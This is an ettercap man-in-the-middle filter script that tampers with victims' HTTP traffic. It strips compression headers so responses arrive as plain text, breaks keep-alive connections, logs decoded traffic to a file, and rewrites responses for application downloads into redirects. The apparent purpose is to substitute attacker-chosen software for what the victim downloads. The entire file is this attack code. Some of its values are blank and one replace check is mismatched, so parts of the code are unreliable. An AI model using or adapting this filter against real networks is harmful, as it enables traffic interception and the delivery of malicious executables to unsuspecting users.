# replace.filter --- ettercap application replacement filter # g0tmi1k --- 3x <--- including this one! ################################################################### if (ip.proto == TCP && ip.dst != '') { # If traffic is TCP protocol and its not coming to us.... if (search(DATA.data, "gzip")) { # ...and if it contains an gzip in its header: replace("gzip", " "); # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string* #msg("[*] Zapped 'gzip'\n"); # Let us know it's been done (= } if (search(DATA.data, "deflate")) { replace("deflate", " "); #msg("[*] Zapped 'deflate'\n"); } if (search(DATA.data, "gzip,deflate")) { replace("gzip,deflate", " "); #msg("[*] Zapped 'gzip,deflate'\n"); } if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #msg("[*] Zapped 'Accept-Encoding'\n"); } if (tcp.src == 80) { # Coming from the web server ??? if (search(DATA.data, "keep-alive")) { replace("keep-alive", "close "); # ....so stop them sending any more requests msg("[*] Zapped 'keep-alive'\n"); } if (search(DATA.data, "keep-alive")) { replace("keep-Alive", "close "); msg("[*] Zapped 'keep-Alive'\n"); } } #------------------------------------------------------------------ log(DECODED.data, "/root/log.log"); if (ip.proto == TCP && search(DATA.data, ": application") ){ #if (search(DATA.data, "Win32")) { # Could use MSDOS??? msg("[>] Found application....\n"); # Let us know we have done it (= if (search(DATA.data, "301 Moved Permanently")) { replace("Location: ", "Location: #"); msg("[>] Replacing application (Replacing)....\n"); # Let us know we have done it (= } if (search(DATA.data, "200 OK")) { replace("200 OK", "301 Moved Permanently Location:"); # Replace HTML code ??? msg("[>] Replacing application (Clean)....\n"); # Let us know we have done it (= } #} } if (search(DATA.data, "")){ # ...and search data, to test for our 'tweak' ;) msg("[+] Replace correctly!\n"); # Let us know it's been done done } }